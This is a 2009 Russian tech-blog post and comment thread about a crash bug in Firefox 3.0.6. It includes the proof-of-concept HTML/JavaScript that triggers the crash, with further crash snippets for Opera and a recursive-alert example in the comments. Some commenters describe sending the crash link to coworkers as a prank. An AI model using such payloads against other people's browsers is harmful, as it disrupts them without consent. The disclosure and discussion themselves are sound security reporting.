Информационная безопасность

индекс

289,89

DoS атака Mozilla Firefox 3.0.6

Firefox 3.0.6 подвержен DoS атаке из-за некорректной обработки определённого кода.
Ждём обновлений…

Пример:
ВНИМАНИЕ!!! Пример кода приведён исключительно в целях ознакомления! Использовать его запрещено!

<BODY onload="

document.designMode='on';//string

document.removeChild(document.firstChild);//object

document.queryCommandState('BackColor');

">

тест (аккуратно, браузер фф скорее всего упадёт)

P.S. если хабрасообщество решит, что код приводить всё же не стоило, я его уберу

upd: в комментах говорят, что с включённым Noscript всё живёт

+88

23 февраля 2009, 22:40

1024

комментарии (91)

+44

gta4kv 23 февраля 2009, 22:53 #

>> P.S. если хабрасообщество решит, что код приводить всё же не стоило, я его уберу
еще как стоило. *потирает руки и злобно смеётся*

jean 23 февраля 2009, 22:58 #

ну так на себе без кода не проверишь!

Morfi 23 февраля 2009, 22:59 #

А где on-line пример? :)

1024 23 февраля 2009, 23:13 # ↑

добавил в топик

brablay 24 февраля 2009, 01:08 # ↑

Моему Firefox с аддоном Noscript от on-line примера ни жарко, ни холодно.

–1

1024 24 февраля 2009, 01:09 # ↑

угу, noscript спасает в этом случае

–1

Vovanys 24 февраля 2009, 11:08 # ↑

под ubuntu c включенным noscript не падает, как только делаешь временно разрешить вылетает )

romad 24 февраля 2009, 12:00 # ↑

а еще если браузер совсем не загружать, тоже не падает

jeje 23 февраля 2009, 22:59 #

Для поддержания полноты информации пояснили вы что делает конкретно код. Я вод третью строчку первый раз вижу в глаза.

Castro 23 февраля 2009, 23:04 # ↑

Минутное гугление привело на www.milw0rm.com/, но всё равно не понял что означает параметр 'BackColor'

jeje 23 февраля 2009, 23:06 # ↑

Ну тогда и новость можно не делать, если все нагуглить можно ;)

Castro 23 февраля 2009, 23:08 # ↑

:) Похоже браузер должен упасть от определения фонового цвета таким образом. Интересно, у кого-то он реально свалился?

jean 23 февраля 2009, 23:11 # ↑

например, у меня, 3.0.3

+17

jeje 23 февраля 2009, 23:13 # ↑

Ура я нашел быстрый способ закрывать свой ff, скорость — 3 секунды :)

myphon 24 февраля 2009, 10:05 # ↑

У меня на правый верхний крестик быстрее почему то…

jeje 24 февраля 2009, 10:08 # ↑

Происходит закрытие окна, процесс в это время все еще висит в памяти, и может висеть еще с минуту. А тут сразу процесс вылетает.

myphon 24 февраля 2009, 10:14 # ↑

Это критично?

Можно и комп выключать из розетки, быстрее будет

jeje 24 февраля 2009, 10:21 # ↑

Когда требуется перезапуск — неприятно. Да и мои ответ был шуткой.

Kastrulya 24 февраля 2009, 10:54 # ↑

хех. воистину. 2-3 секунды уходит. делаем домен bezpalevaff.ru и там злобный код. идет начальство-открой страницу.=)

koliasoft 24 февраля 2009, 15:43 # ↑

А если идет начальник, а вы нажали на крестик для закрытия окна — то начальник быстренько смотрит в процессы?

А вот для быстрого перезапуска — самое оно. Только, по-моему, во время перезапуска мозилла сохраняет настройки. А с этой багой — нет.

Kastrulya 24 февраля 2009, 17:21 # ↑

ну при нажатии крестика не факт, что закроется сразу даже само окно. а вдруг немного подвиснет? всяко бывает. а тут прям надежно так.

leonard 23 февраля 2009, 23:55 # ↑

У меня. Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6

1024 23 февраля 2009, 23:14 # ↑

я этого, к сожалению, не знаю…

jeje 23 февраля 2009, 23:22 # ↑

Думаю msdn немного поможет в прояснении msdn.microsoft.com/en-us/library/ms533049(VS.85).aspx

–3

Castro 23 февраля 2009, 23:03 #

А новость откуда собственно?
Ясное дело, что хабрасообщество решит убрать этот код.
Во-первых, не стоит дразнить читателей журнала «Хакир», а во-вторых, какой вывод должно сделать хабрасообщество при просмотре этого кода?

1024 23 февраля 2009, 23:20 # ↑

Я первый раз прочёл на www.securitylab.ru/poc/368700.php. А так много где заметки есть по этому поводу. На www.milw0rm.com/, например.

Если решит убрать, то конечно уберу, не вопрос.

Вывод? Что этот код может привести к падению браузера. Ну и что надо заботиться о своей безопасности

dmiceman 24 февраля 2009, 09:05 # ↑

какой вывод должно сделать хабрасообщество при просмотре этого кода?

То что не надо дереференсить нулевой указатель?

Nc_Soft 23 февраля 2009, 23:06 #

Что-то не падает…

1024 23 февраля 2009, 23:15 # ↑

странно. лично у меня рухнул. выше в комментариях тоже отписывались о положительном результате

Nc_Soft 23 февраля 2009, 23:35 # ↑

Все нормально, успешно рухнул :)
Я его просто в непустую страницу всунул в body.

easyman 24 февраля 2009, 08:29 # ↑

А какая версия FF/OS у Вас?
Есть ли аддоны типа Noscript?

Morozhko 23 февраля 2009, 23:12 #

А причём тут DoS атака?

1024 23 февраля 2009, 23:15 # ↑

ну потому что firefox отказывается_обслуживать

–29

almaz 23 февраля 2009, 23:26 # ↑

для него это нормально ;)

FilimoniC 23 февраля 2009, 23:27 # ↑

Denial of Service. Отказ в обслуживании.

–1

Morozhko 24 февраля 2009, 15:53 # ↑

а по мне так это крэш браузера. Браузер же не обслуживает удалённых клиентов.

seneast 23 февраля 2009, 23:16 #

> тест (аккуратно, браузер фф скорее всего упадёт)

упал(

Kastrulya 24 февраля 2009, 11:07 # ↑

здесь ключевое слово СКОРЕЕ ВСЕГО, т.к. падает он оочень быстро.

Reey 23 февраля 2009, 23:16 #

3.1b2 тож падает =\

TR4V15 23 февраля 2009, 23:37 # ↑

тоже решил проверить, думал относится только к 3.0.* оказалось что передалось по наследству.

Devgru 23 февраля 2009, 23:38 #

Упал. 3.0.6, Ubuntu.

–1

Optik 23 февраля 2009, 23:39 #

Устоял.

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009021207 GranParadiso/3.0.6

–1

Optik 24 февраля 2009, 00:15 # ↑

С отключенным noscript рухнул.

EvRiaL 23 февраля 2009, 23:44 #

3.2a1pre «Minefield» — не подвержен.

Barttos 23 февраля 2009, 23:52 #

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox 3.1 Упал.

Argentum47 23 февраля 2009, 23:58 #

3.1b3pre (ночная от 18 февраля) упал. а вот с 3.2a1pre (ночная от 22 февраля) все в порядке

–1

Dimusik 24 февраля 2009, 00:05 #

3.0.6 — WinXP — упал моментально :)

shtirlic 24 февраля 2009, 00:06 #

https://bugzilla.mozilla.org/show_bug.cgi?id=456727 в багзилле

jean 24 февраля 2009, 00:32 # ↑

хочется отметить, что судя по багзилле уязвимости 5 месяцев!

f33l 24 февраля 2009, 01:00 # ↑

мда…
начал понимать тех, кто ставит noscript, раньше считал это ппц дикостью

–1

joice 24 февраля 2009, 00:11 #

Gentoo
www-client/mozilla-firefox (3.0.6@16.02.2009): Firefox Web Browser + Noscript
полет нормальный :D

kottt 24 февраля 2009, 00:18 #

Про код это Вы зря. Обычно, когда сообщают об уязвимости, просто говорят, что она есть.
Кстати, у мозиллы уже версия 3.0.7 в релиз-кандидатах с 20 февраля (http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/)

lifestar 24 февраля 2009, 11:41 # ↑

Почти всегда приводят пример кода или готовый код эксплойта.
Какой смысл в информации о «просто уязвимости», когда нет возможности её «пощупать»?

redisko 24 февраля 2009, 00:18 #

упал. только ссылку можно убрать, там пустая страница. пришлось самому html клепать

kabachok 24 февраля 2009, 00:32 #

зе зарепортили баг разработчикам? ))

jean 24 февраля 2009, 00:34 # ↑

см. выше habrahabr.ru/blogs/infosecurity/52653/#comment_1398191

kabachok 24 февраля 2009, 00:43 # ↑

а чеж они не чешутся-то?

НЛО прилетело и опубликовало эту надпись здесь

–1

slam007 24 февраля 2009, 00:32 #

код работает — ФФ 3 упал

НЛО прилетело и опубликовало эту надпись здесь

alagar 24 февраля 2009, 00:47 #

кто то может код пояснить?

–3

kns 24 февраля 2009, 00:55 #

~~{\rtf\pict\&&}~~ ФФокапец. Как ни странно, но многие из моих знакомых сидят не на фоксе. Мелочь, а приятно.

denim 24 февраля 2009, 01:00 #

Mozilla/5.0 (X11; U; Linux x86_64; be; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
падает
ФФ последнее время начинает разочаровывать, стал тормозной и не поворотливый.

Jenyay 24 февраля 2009, 11:12 # ↑

По-моему, как раз наоборот он постепенно становится все шустрее и меньше жрет памяти.

asci 24 февраля 2009, 01:24 #

имхо, очевидно, что с noscript или отключенным яваскриптом все будет работать))
кстати, а что этот код должен делать (кроме убийства фф)?

crx 24 февраля 2009, 01:39 #

Спасибо, прислал всем сотрудникам ссылку вида a
ФФ отвалился только у интернов.

nikzh 24 февраля 2009, 01:53 #

Спасибо, закончу сегодня свой ночной интернет-серфинг необычным способом, а то как раз спать пора :)

homm 24 февраля 2009, 07:01 #

А вот и для оперы пряники:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html> <head> <title>SuperSelect</title> <style type="text/css"> optgroup { display: table-row } option { display: table-cell } </style> </head> <body> <form> <select> <optgroup> <option>1</option> <option>2</option> </optgroup> <optgroup> <option>32222</option> <option>4</option> </optgroup> </select> </form> </body> </html> * This source code was highlighted with Source Code Highlighter.

–14

egorinsk 24 февраля 2009, 09:29 # ↑

Работает!!!

Но в то время как Опера тоже глючна, она быстрее, безопаснее и показывает меньше рекламы, и работает бытсрее фаерфокса!!(Версия 3 — вообще тормоз)

p.s. Будь проклят маркетинг и бизнес-планы, убивающие хороший код.

homm 24 февраля 2009, 10:35 # ↑

Зачем же так остро реагировать? Опера живет и процветает, постоянно выходят новые версии с новыми задумками и реализованными идеями. Так что никто её не убивает. А этот баг я уже засубмитил, и думаю не я один.

kns 24 февраля 2009, 09:58 # ↑

Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0

Падают. Интересно. :)

myiworm 24 февраля 2009, 07:43 #

Ну вот вам на ff2. Не закрывают второй год.
myiworm.com/public/exploits/firefox2/firefox_2_0_0_9-denial_of_service_2.html

myiworm 24 февраля 2009, 07:45 # ↑

bugzilla.mozilla.org/show_bug.cgi?id=403010

XPilot 24 февраля 2009, 08:39 # ↑

Поддержку Firefox 2.0.x уже дропнули, а данный эксплойт не действует на Minefield 3.2a1pre под WinXP и Firefox 3.0.6 под Linux…

myiworm 24 февраля 2009, 09:17 # ↑

данный эксплоит был актуален с FF 2.0.0.9 до 2.0.0.20, и так и не был закрыт в течении полутора лет. Вот такая оперативность.

XPilot 24 февраля 2009, 09:19 # ↑

Ну, а смысл от него теперь, когда он неактуален? Фактически, пофиксили, в ветке 3.x…

GodSon 24 февраля 2009, 09:50 #

да падает…
причем под линухами процесс висит еще долго и kill убивать его не хочет…

egorinsk 24 февраля 2009, 09:57 # ↑

В мое время у команды kill была опция -9, хотя грохать GUI-процессы из ком. строки — изврат.

BisnoyZakat 24 февраля 2009, 10:10 #

Работает конечно отлично, а какое может быть реально применение этой баги? Т.е как мне могут этим навредить кроме того, что у меня браузер закроется? Если я правильно понимаю именно по-этому в багзилле до сих пор статус стоит нормал…

myphon 24 февраля 2009, 10:19 # ↑

На хабре этот код бы под кнопку написать. Как долго вы бы думали что это и почему так происходит?
Приминение может быть быть в сфере зления пользователя так сказать, это тоже не мало.

BisnoyZakat 24 февраля 2009, 10:52 # ↑

Все это так называемый киддинг… реальной экономической выгоды… финансовая выгода, к примеру, заставляет людей писать трояны =) и по-этому баги которые влекут за собой распространения троянов обозначают как «важно», а эта бага пустышка… ну закрылся бразуер и что? не один адекватный хакер не будет вешать это на взломанный ресурс.

myphon 24 февраля 2009, 10:54 # ↑

Трояны для экономической выгоды. А обычные вирусы для чего? Для того же и этот код.

vpbar 24 февраля 2009, 10:59 #

Ну упал и упал. У меня вон фокс падает при открытии pdf. Вот это проблемка. А тут я даже сначало и не понял почему не работает, а потом вспомнил про Noscript. :)
Скрипты эт такая штука, что отказ в обслуживании можно сделать сотнями (тысяч) способов. Вот например
<script language=«Javascript»>
function bu(){ alert('BU'); bu(); };
bu();
</script>
Или это тоже считается эксплойтом и эксплуатирует какую-то уязвимость.

–1

Cruach 24 февраля 2009, 11:11 #

Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.6) Gecko/2009020709 Fedora/3.0.6-1.0.140asp Firefox/3.0.6 рухнул…
*ушел ставить Noscript

golden13 24 февраля 2009, 12:17 #

SeaMonkey 2.0b1pre — не падает :)
(Noscript не стоит)

webster 24 февраля 2009, 13:17 #

упал…

mgyk 24 февраля 2009, 14:04 #

Ну падает и падает, где собственно проблема? Данные пользователя можно прочитать — нет. Использовать уязвимость для построения ботнета — нет. Возможностей положить любой браузер корявым джаваскриптом куча. Чинить надо, как и много других багов, но приоритет явно на багах где есть проблемы с безопастностью.

НЛО прилетело и опубликовало эту надпись здесь